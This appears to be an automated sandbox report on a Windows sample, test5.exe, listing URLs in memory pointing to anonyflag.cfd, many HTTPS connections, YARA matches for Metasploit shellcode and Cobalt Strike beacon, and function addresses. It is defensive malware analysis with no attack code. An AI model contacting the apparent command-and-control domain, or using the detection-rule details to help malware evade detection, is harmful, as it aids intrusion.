Source: test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2322882748.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/dep
Source: test5.exe, 00000000.00000003.2659827113.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/der
Source: test5.exe, 00000000.00000003.1871884712.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/iiloksh
Source: test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcno
Source: test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/o
Source: test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2229582416.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2211383479.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2378590026.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2891419412.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2433982166.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2526696022.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2154433482.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/p
Source: test5.exe, 00000000.00000003.1755611504.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/rovider
Source: test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2639261263.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2738354693.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2775374438.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/tography
Source: test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/vide
Source: test5.exe, 00000000.00000003.2700818871.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/yflag.cfd/
Source: test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/yflag.cfd/P
Source: test5.exe, 00000000.00000003.2098276910.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/yflag.cfd/Y
Source: test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/yflag.cfd/p
Source: test5.exe, 00000000.00000002.2903186062.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/~

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 47.90.135.102:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.5:443 -> 192.168.2.4:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown

Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B25C0 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,	0_2_006B25C0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B0D80 LoadLibraryExW,LoadLibraryExW,NtCreateWaitCompletionPacket,NtAssociateWaitCompletionPacket,NtCancelWaitCompletionPacket,RtlGetCurrentPeb,RtlGetVersion,	0_2_006B0D80
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B0980 NtCancelWaitCompletionPacket,SetWaitableTimer,NtAssociateWaitCompletionPacket,	0_2_006B0980

Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00682060	0_2_00682060
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006E464C	0_2_006E464C
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006BD8E0	0_2_006BD8E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0068C980	0_2_0068C980
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006C4AE0	0_2_006C4AE0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A5DC0	0_2_006A5DC0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00692EA0	0_2_00692EA0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A4FA0	0_2_006A4FA0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0068A080	0_2_0068A080
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00702160	0_2_00702160
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006C7180	0_2_006C7180
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A9260	0_2_006A9260
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006BE260	0_2_006BE260
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006DB260	0_2_006DB260
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AA220	0_2_006AA220
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006C92E0	0_2_006C92E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006D8340	0_2_006D8340
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00700340	0_2_00700340
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B3460	0_2_006B3460
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006BF420	0_2_006BF420
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006EA4E0	0_2_006EA4E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AC480	0_2_006AC480
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006BB540	0_2_006BB540
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AD520	0_2_006AD520
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AB5E0	0_2_006AB5E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_007025E0	0_2_007025E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AB5E0	0_2_006AB5E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00704640	0_2_00704640
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00697605	0_2_00697605
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B76E0	0_2_006B76E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0068D760	0_2_0068D760
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006D4760	0_2_006D4760
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006CF740	0_2_006CF740
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00694793	0_2_00694793
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006DF820	0_2_006DF820
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006E8800	0_2_006E8800
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0069F8C0	0_2_0069F8C0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006979E0	0_2_006979E0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006DAAE0	0_2_006DAAE0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006ECA80	0_2_006ECA80
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006FFB20	0_2_006FFB20
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006EDB09	0_2_006EDB09
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00683B00	0_2_00683B00
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006D0B00	0_2_006D0B00
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006BAB80	0_2_006BAB80
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A2C90	0_2_006A2C90
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00696D20	0_2_00696D20
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006AFD20	0_2_006AFD20
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A3D00	0_2_006A3D00
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00690DC0	0_2_00690DC0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006DDDC0	0_2_006DDDC0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A8D80	0_2_006A8D80
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006B6EA0	0_2_006B6EA0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0069DFE0	0_2_0069DFE0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00695FC0	0_2_00695FC0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C1B140	0_2_0000021551C1B140
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C0E0E8	0_2_0000021551C0E0E8
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551BFD784	0_2_0000021551BFD784
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C1BAB0	0_2_0000021551C1BAB0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C061C0	0_2_0000021551C061C0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C0FD18	0_2_0000021551C0FD18
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C103DC	0_2_0000021551C103DC
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C10E90	0_2_0000021551C10E90
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00000215537602D7	0_2_00000215537602D7
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_000002155375F15F	0_2_000002155375F15F
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_000002155375F823	0_2_000002155375F823
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_000002155375D52F	0_2_000002155375D52F
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_000002155374CBCB	0_2_000002155374CBCB

Source: C:\Users\user\Desktop\test5.exe	Code function: String function: 006E7680 appears 42 times
Source: C:\Users\user\Desktop\test5.exe	Code function: String function: 006B5660 appears 31 times
Source: C:\Users\user\Desktop\test5.exe	Code function: String function: 006B8420 appears 584 times
Source: C:\Users\user\Desktop\test5.exe	Code function: String function: 006E9320 appears 533 times
Source: C:\Users\user\Desktop\test5.exe	Code function: String function: 006B7C00 appears 60 times

Source: test5.exe

Static PE information: Number of sections : 15 > 10

Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
